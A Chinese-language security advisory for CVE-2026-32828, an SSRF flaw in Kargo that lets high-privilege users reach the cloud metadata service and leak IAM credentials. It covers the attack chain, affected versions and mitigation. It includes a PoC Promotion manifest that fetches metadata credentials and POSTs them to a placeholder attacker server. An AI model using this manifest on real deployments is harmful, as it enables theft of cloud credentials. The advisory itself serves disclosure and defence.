CVE-2026-32828 CVSS 4.9 中危

CVE-2026-32828 Kargo SSRF漏洞致云凭证泄露

披露日期: 2026-03-20

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-32828

漏洞类型

服务器端请求伪造 (SSRF)

CVSS评分

4.9 中危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

Kargo

漏洞概述

Kargo在特定版本中存在服务器端请求伪造（SSRF）漏洞。由于http和http-download推广步骤允许完全控制请求头和方法，且未限制对链路本地地址的访问，经过身份验证的高权限攻击者可利用此漏洞访问云实例元数据服务（169.254.169.254），进而窃取IAM凭证等敏感信息。该漏洞绕过了基于请求头的云厂商SSRF防御机制。

技术细节

该漏洞的核心在于Kargo的`http`和`http-download`推广步骤缺乏对目标地址的有效过滤，特别是链路本地地址。攻击者首先需要获取该系统的高级权限，能够创建或更新Stages及Promotion资源。利用过程中，攻击者精心构造一个恶意的Promotion清单，将请求目标指向云实例的元数据服务（169.254.169.254）。关键在于，由于这些步骤允许攻击者完全自定义HTTP请求头和方法，攻击者可以绕过云厂商通常依赖的特定请求头（如`X-aws-ec2-metadata-token`）进行的SSRF防护验证。一旦请求发出，云实例的敏感信息（如IAM角色凭证）将被返回。攻击者随后可以通过查看Promotion的状态字段、利用Git仓库回显或通过第二个http步骤作为数据通道，将窃取的数据外带。此漏洞风险在于直接威胁云基础设施的安全。

攻击链分析

STEP 1

权限获取

攻击者获取Kargo系统的高权限账号，拥有创建或更新Stages及Promotion资源的权限。

STEP 2

构造载荷

攻击者编写恶意的Promotion清单（YAML），在http步骤中将URL设置为云元数据服务地址（169.254.169.254），并自定义请求头。

STEP 3

提交执行

攻击者将恶意清单提交给Kargo，系统解析并执行Promotion步骤，向内部受限地址发起HTTP请求。

STEP 4

数据回传

Kargo获取到元数据服务的响应（如IAM凭证），攻击者通过Promotion状态字段、Git仓库或配置的第二个http步骤接收泄露的数据。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# PoC Concept: Malicious Kargo Promotion Manifest
apiVersion: kargo.akuity.io/v1alpha1
kind: Promotion
metadata:
  name: ssrf-exploit
  namespace: default
spec:
  stage: target-stage
  steps:
    - type: http
      config:
        # Target the cloud instance metadata endpoint
        url: "http://169.254.169.254/latest/meta-data/iam/security-credentials/"
        method: "GET"
        headers:
          # Attackers control headers to bypass cloud provider SSRF protections
          User-Agent: "kargo-exploit"
          Metadata: "true"
        # Response data (IAM credentials) will be reflected in the Promotion status or logs
    - type: http
      config:
        # Exfiltrate data to an attacker-controlled server via a second step
        url: "http://attacker-controlled-server/exfiltrate"
        method: "POST"
        body: "{{ steps.http.output.body }}"

影响范围

1.4.0 - 1.6.3

1.7.0-rc.1 - 1.7.8

1.8.0-rc.1 - 1.8.11

1.9.0-rc.1 - 1.9.4

防御指南

临时缓解措施

建议立即在网络层面限制Kargo服务的出站访问，特别是阻断对169.254.169.254（链路本地地址）的连接。同时，应严格审查并最小化用户权限，确保仅有受信任的管理员具备创建或修改Promotion资源的权限，直到完成升级。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表